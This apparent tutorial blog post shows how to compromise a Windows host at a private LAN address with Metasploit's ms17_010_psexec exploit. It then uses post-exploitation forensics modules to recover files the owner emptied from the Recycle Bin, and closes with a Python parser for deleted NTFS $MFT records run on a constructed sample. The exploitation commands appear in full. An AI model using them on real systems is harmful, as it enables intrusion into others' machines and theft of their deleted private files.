How do hackers recover deleted files? Even ones removed by emptying the Recycle Bin!
Author: FancyPig
Video walkthrough
Have you ever deleted a file by accident and then emptied the Recycle Bin as well? In this episode's video we look at how a hacker, after breaking in, recovers deleted files and completes forensics on them, and how the Metasploit framework can be used to recover files that were deleted from a computer's disk!
Step-by-step walkthrough
Taking over the target computer
Start the Metasploit penetration testing framework
sudo msfconsole
Search for the eternal modules
search eternal

Use the module listed at index 1, exploit/windows/smb/ms17_010_psexec
use 1

Then set the IP address of the target server
set RHOSTS 192.168.0.186

Then run it
exploit
The output here shows that the target machine has been taken over

You can type the following command to take over the Windows computer's cmd terminal
shell

Type the following command to leave the shell and continue with the next steps
exit
We then type the following command to send the session to the background
background

Data recovery and forensics
Now for the part everyone cares about most: how do we recover the files we deleted?
We will use the post/windows/gather/forensics/enum_drives module
use post/windows/gather/forensics/enum_drives

The session we just sent to the background is SESSION 1, so we need to point this module at SESSION 1
set SESSION 1
Then run it
run
Here we can see the drives on the machine

We can go straight to the next step and start recovering data from drive E, using the post/windows/gather/forensics/recovery_files module
use post/windows/gather/forensics/recovery_files
Then set the drive to E:, because the files were deleted from drive E at the beginning
set DRIVE E:
Then set the session to SESSION 1
set SESSION 1

Then run the module
run
We can see that it has found two files that were removed via the Recycle Bin

Now we try to recover them
set FILES 356909056,356910080
The FILES value must be the file ID numbers the module just listed
Then run it
run
We can see that the files have been recovered into the /root/.msf4/loot directory

Change into that directory
cd /root/.msf4/loot
Use the cat command to view the files there: they are exactly the same as the deleted originals. That concludes the data recovery and forensics!
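What makes this recovery possible is NTFS bookkeeping: deleting a file, or emptying the Recycle Bin, only clears the in-use bit of the file's MFT record, and the record and the file's clusters survive until the filesystem reuses them, which is why an examiner images a disk before writing anything to it. The Python below is an added example, not the Metasploit module's code: it builds a constructed three-record $MFT image and scans it for deleted file records the way such a recovery tool does; treating each record's byte offset as the counterpart of the file ID the module prints is my assumption.

```python
import struct
MFT_RECORD_SIZE = 1024   # NTFS default; a real parser reads the record size from the boot sector
ATTR_FILE_NAME = 0x30    # $FILE_NAME attribute type
FLAG_IN_USE = 0x0001     # bit 0 of the record flags at offset 0x16; deletion clears it

def build_mft_record(name, in_use, parent_ref=5):
    """Constructed sample: a minimal FILE record with one resident $FILE_NAME attribute
    (real records also carry an update sequence array that must be applied before parsing)."""
    name_utf16 = name.encode("utf-16-le")
    body = struct.pack("<Q", parent_ref) + b"\x00" * 32         # parent MFT ref + 4 timestamps
    body += struct.pack("<QQII", 4096, len(name_utf16), 0, 0)   # alloc size, real size, flags, reparse
    body += struct.pack("<BB", len(name_utf16) // 2, 3) + name_utf16  # name length, namespace, name
    attr_len = (24 + len(body) + 7) & ~7                        # 24-byte resident header, 8-aligned
    attr = struct.pack("<IIBBHHHIHBB", ATTR_FILE_NAME, attr_len, 0, 0, 0, 0, 0,
                       len(body), 24, 0, 0) + body
    header = struct.pack("<4sHHQHHHHIIQH", b"FILE", 48, 0, 0, 1, 1, 56,
                         FLAG_IN_USE if in_use else 0, 56 + attr_len + 8, MFT_RECORD_SIZE, 0, 2)
    record = header.ljust(56, b"\x00") + attr.ljust(attr_len, b"\x00") + b"\xff\xff\xff\xff"
    return record.ljust(MFT_RECORD_SIZE, b"\x00")

def parse_mft_record(rec):
    """Return (name, deleted) for one FILE record, or None if it cannot be parsed."""
    if len(rec) < 48 or rec[:4] != b"FILE":
        return None
    off, flags = struct.unpack_from("<HH", rec, 0x14)           # first attribute offset, flags
    while off + 24 <= len(rec):
        attr_type, attr_len = struct.unpack_from("<II", rec, off)
        if attr_type == 0xFFFFFFFF or attr_len < 24:            # end marker, or a corrupt length
            break
        if attr_type == ATTR_FILE_NAME and rec[off + 8] == 0:   # resident $FILE_NAME only
            body = off + struct.unpack_from("<H", rec, off + 0x14)[0]
            name = rec[body + 66:body + 66 + 2 * rec[body + 64]].decode("utf-16-le")
            return name, not (flags & FLAG_IN_USE)
        off += attr_len
    return None

def find_deleted_entries(mft_image):
    """Scan a raw $MFT image; return deleted records as (byte offset, name)."""
    found = []
    for offset in range(0, len(mft_image), MFT_RECORD_SIZE):
        parsed = parse_mft_record(mft_image[offset:offset + MFT_RECORD_SIZE])
        if parsed and parsed[1]:
            found.append((offset, parsed[0]))   # offset stands in for the module's file ID (assumption)
    return found

# Constructed three-record $MFT image: one live file followed by two deleted ones.
SAMPLE_MFT = b"".join([build_mft_record("report.docx", in_use=True),
                       build_mft_record("secret.txt", in_use=False),
                       build_mft_record("notes.txt", in_use=False)])
```

The name is all a record alone gives back; recovering the content additionally requires reading the $DATA attribute's cluster runs, and it only succeeds while those clusters have not been overwritten.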

I hope you learned a lot from today's tutorial 😊